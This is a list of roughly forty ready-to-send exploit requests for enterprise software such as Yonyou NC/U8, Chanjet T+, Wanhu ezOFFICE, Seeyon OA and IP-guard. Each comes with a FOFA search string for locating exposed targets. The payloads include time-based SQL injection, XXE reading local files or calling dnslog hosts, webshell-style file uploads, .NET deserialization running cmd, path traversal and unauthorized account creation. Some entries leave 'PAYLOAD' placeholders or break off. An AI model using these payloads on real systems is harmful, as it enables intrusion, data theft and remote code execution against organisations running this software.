33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (Entsoft) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate LianAiYun all-in-one face-recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing in lines 42 and 43 of the response confirms the vulnerability.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
